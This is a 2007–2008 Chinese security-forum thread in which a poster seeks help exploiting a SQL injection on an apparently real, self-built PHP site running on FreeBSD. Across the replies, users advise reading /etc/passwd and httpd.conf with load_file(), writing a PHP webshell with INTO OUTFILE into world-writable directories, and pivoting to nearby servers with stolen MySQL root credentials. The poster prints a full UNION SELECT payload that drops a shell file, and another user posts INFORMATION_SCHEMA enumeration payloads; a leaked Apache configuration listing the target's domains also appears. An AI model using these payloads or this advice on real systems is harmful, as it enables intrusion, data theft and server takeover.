Board logo

标题: [讨论]郁闷的PHP注入.... [打印本页]

作者: 虚竹    时间: 2008-7-20 23:24     标题: [讨论]郁闷的PHP注入....

[讨论]郁闷的PHP注入....
议题作者:寂寞hacker
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

  今天安检一个站的时候遇到了个郁闷的问题,他全站是html静态的,好不容易在一个偏僻的角落找到了个php注入点,偷笑中....还没笑完呢,郁闷的事情来了,首先猜测字段,偶猜到48了才正常,吓得我以为没戏了,可以直接loadfile /etc/passwd 这个文件,但是郁闷的事情发生了。

情况如下图:

   未命名.jpg (12 KB)

2007-10-29 17:35

原因是网页限制了信息的长度,三个能显示的地方都试过了,基本上只能把pass这个文件的头信息显示出来,后台找不到,数据库字段也猜不到,网站是他们自己写的!WEB环境:
Apache/2.0.59 (Unix) PHP/4.4.4  系统是FreeBSD,对红旗系统不熟。。。接下来。哪位高手指教下。成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。


帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

jackal
晶莹剔透§烈日灼然
作者: zhcaihhhh    时间: 2008-7-20 23:24

left(file,100)

查看一段字符再合并.
帖子22 精华0 积分59 阅读权限40 性别男 在线时间105 小时 注册时间2004-11-18 最后登录2008-6-30 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

Helvin
团队决策人

作者: 德德    时间: 2008-7-20 23:24

FreeBSD跟红旗什么关系?
/etc/passwd 文件中没有密码。ports编译的MySQL没有root权限拿不到/etc/master.passwd,就算拿到也基本没用,master.passwd中的密码是MD5的。

输出个webshell看看root下面有什么,有没有记录密码什么的,看一下有没有装有能提权的软件,BSD的内核级漏洞很少,可以从应用程序软件上入手。系统应该是FB6.1吧幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子644 精华22 积分5000 阅读权限255 在线时间1758 小时 注册时间2005-1-7 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP 爱要怎么说出口

...
晶莹剔透§烈日灼然
作者: kklau    时间: 2008-7-20 23:24

load_file() 读下。。48 个字段? PHP手工 苦活啊。慢慢跑吧··
帖子32 精华0 积分114 阅读权限40 性别男 在线时间48 小时 注册时间2007-8-22 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

asm
运维管理组

作者: ahwx    时间: 2008-7-20 23:24

字符截取啊,能让显示多少就显示多少游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn
帖子1598 精华30 积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

寂寞宝贝
荣誉会员

作者: 高步轩仔    时间: 2008-7-20 23:24

引用:
引用第2楼Helvin于2007-10-29 18:55发表的 :
FreeBSD跟红旗什么关系?
/etc/passwd 文件中没有密码。ports编译的MySQL没有root权限拿不到/etc/master.passwd,就算拿到也基本没用,master.passwd中的密码是MD5的。

输出个webshell看看root下面有什么,有没有记录密码什么的,看一下有没有装有能提权的软件,BSD的内核级漏洞很少,可以从应用程序软件上入手。系统应该是FB6.1吧
汗!说错了!FreeBSD跟红旗没关系,关于PASS被加密,这条路不走了!至于Helvin大哥说的输出webshell是什么意思?建个表导出么?给点资料!很久没碰这个了!呵呵!谢谢!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

寂寞宝贝
荣誉会员

作者: 车来车去    时间: 2008-7-20 23:24

FreeBSD下面。。。如何得到当前的WEB路径?因为他关闭了错误回显!得不到文件路径!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

hackest
运维管理组

作者: marco    时间: 2008-7-20 23:24

有root的话可以into outfile()导出一句话的My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料引用 报告 回复 TOP

ring04h
团队执行官

作者: 白兔仔    时间: 2008-7-20 23:24

引用:
引用第7楼hackest于2007-10-29 23:39发表的 :
有root的话可以into outfile()导出一句话的
php outfile 需要 ' 单引号或者双引号,  无法outfile!
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

ring04h
团队执行官

作者: 东莞维维    时间: 2008-7-20 23:24

引用:
引用第6楼寂寞宝贝于2007-10-29 20:56发表的 :
FreeBSD下面。。。如何得到当前的WEB路径?因为他关闭了错误回显!得不到文件路径!
load httpd.conf httpd.conf 国内全是 755 权限. 能读.
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: 凯宁    时间: 2008-7-20 23:24

引用:
引用第9楼ring04h于2007-10-30 00:42发表的 :


load httpd.conf httpd.conf 国内全是 755 权限. 能读.
/usr/local/httpd/conf/httpd.conf

默认路径?成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: jack    时间: 2008-7-20 23:24

上面的路径load 没东西!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: sxltxyh    时间: 2008-7-20 23:24

/usr/local/apache2/conf/httpd.conf

这个能读出东东!不过。。。
555555555555

住所: # # Based upon the NCSA server configuration files originally by Rob M

还是受这个框的限制。。。。。。我再想想办法!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: dabofeng    时间: 2008-7-20 23:24

哦也。。。。拿到了。。不过!看不懂ing.....找了几个目录都不对。。求救!

省略废话一大堆后:如下!

module-specific configurations # Include conf/ssl.conf ### Section 3: Virtual Hosts # # VirtualHost: If you want

to maintain multiple domains/hostnames on your # machine you can setup VirtualHost containers for them. Most

configurations # use only name-based virtual hosts so the server doesn't need to worry about # IP addresses.

This is indicated by the asterisks in the directives below. # # Please see the documentation at # # for further

details before you try to setup virtual hosts. # # You may use the command line option '-S' to verify your

virtual host # configuration. # # Use name-based virtual hosting. # #NameVirtualHost *:80 NameVirtualHost

172.28.1.70 ServerName localhost ServerAdmin info@lonely.cn DocumentRoot /usr/httpd ServerAdmin info@lonely.cn

DocumentRoot /usr/httpd/lonely ServerName www.lonely.cn ServerAlias lonely.cn www.lonely.cn lonely.cn lonely.org

ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/lpsgsj ServerName lps.lonely.cn ServerAlias lps.lonely.cn

ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/meitangsj ServerName meitan.lonely.cn ServerAlias

meitan.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin info@lonely.cn DocumentRoot /usr/httpd/js

ServerName js.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin info@lonely.cn DocumentRoot

/usr/httpd/go ServerName go.lonely.cn # # ServerAdmin info@lonely.cn # DocumentRoot /usr/httpd/test # ServerName

test.lonely.cn # # # VirtualHost example: # Almost any Apache directive may go into a VirtualHost container. #

The first VirtualHost section is used for requests without a known # server name. # # # ServerAdmin

webmaster@dummy-host.example.com # DocumentRoot /www/docs/dummy-host.example.com # ServerName dummy-

host.example.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-

access_log common #

帮忙看看。。。谢谢!Web路径,我试了几个都不对!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: 胖嘟嘟    时间: 2008-7-20 23:24

汗!最新进度,搞到root帐号密码,3306也开了。。。但是,默认禁止ROOT远程连接!靠!哪位有PHP导出SHELL的资料,给份。谢谢!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

cnhawk
晶莹剔透§烈日灼然
作者: wds    时间: 2008-7-20 23:24

freebsd 默认是禁止root远程登录
而且su成root要求必须是wheel组的用户
帖子24 精华0 积分79 阅读权限40 在线时间60 小时 注册时间2004-12-31 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

Helvin
团队决策人

作者: d501    时间: 2008-7-20 23:24

BSD root不好拿,他说的应该是MySQL root

WEB绑定有域名,你管他能不能些,解不解析,只要在这些目录下面找个777 ,写入Shell就可以了。是在找不到就当份程序下来,自己查找一下有什么可以利用的地方,所有的WEB目录都有价值,也许有些域名没有解析过来。

172.28.1.70这个是你修改过的,还是他们自己的,如果是自己有的那可能他们上面还有其他服务器在附近,用SQL密码连一下附近的机器测试一下幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子644 精华22 积分5000 阅读权限255 在线时间1758 小时 注册时间2005-1-7 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: gmcc-lxx    时间: 2008-7-20 23:24

Web目录自己研究出来了,看了下大虾们的php导出shell的文章,最后得到如下的东东!因为我能写东西的地方在另外一个库,所以这里我跨库查询了,ts04是我的小马内容, 没过滤!我不要*/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/* 这一段能执行查询的!而且查看页面源代码,我的小马原样在,可是加上这个就查询出错了,貌似是我这个导出没写对!大虾们指教!

/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: 逍遥公子    时间: 2008-7-20 23:24

还有,他们的web程序一看就是自己写的,很烂的那种!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

ggdd
晶莹剔透§烈日灼然
作者: 1600cc    时间: 2008-7-20 23:24

substring和load_file()连用。想导出必须找到可写目录。
帖子3 精华0 积分13 阅读权限40 性别男 在线时间0 小时 注册时间2007-5-1 最后登录2008-6-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

作者: btjily    时间: 2008-7-20 23:24

我就是想问


/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*

这个导出语句对了木。。。。。不对的话麻烦哪位大虾,说下改哪个?成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然
作者: →有几坏←    时间: 2008-7-20 23:24

还有一种尝试:找找看有没有PHPMYADMIN的目录,用root登录进去,插表导出shell就舒服多了。当然前提还是得有个目标777的目录
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

akens
晶莹剔透§烈日灼然
作者: FI~鱼~SH    时间: 2008-7-20 23:24

借地方发个和PHP有关的问题:
http://www.***.com/view.php?id=650 存在注入点,手工检测有74个字段,所以没办法用工具查表
用and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.TABLES--
暴出所有表并找到admins表,但是问题来了,常用列都猜了,但是猜不到,想用
/**/and/**/1=2/**/union/**/select/**/1,COLUMN_NAME,3,4。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME='admins'--
把admins表中的列暴出来,死活都暴不了,不知道是语句错了还是其他的原因,请大家帮忙看看
帖子22 精华0 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 查看详细资料引用 报告 回复 TOP

heiye88
晶莹剔透§烈日灼然
作者: 滚死草    时间: 2008-7-20 23:24

呵呵...不要急...很简单的...先把思路整理好...比如你前面解决那些问题的方法和思考过程都可以写一写。。方便大家帮你。。。也许在整理的过程中你会豁然开朗..
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2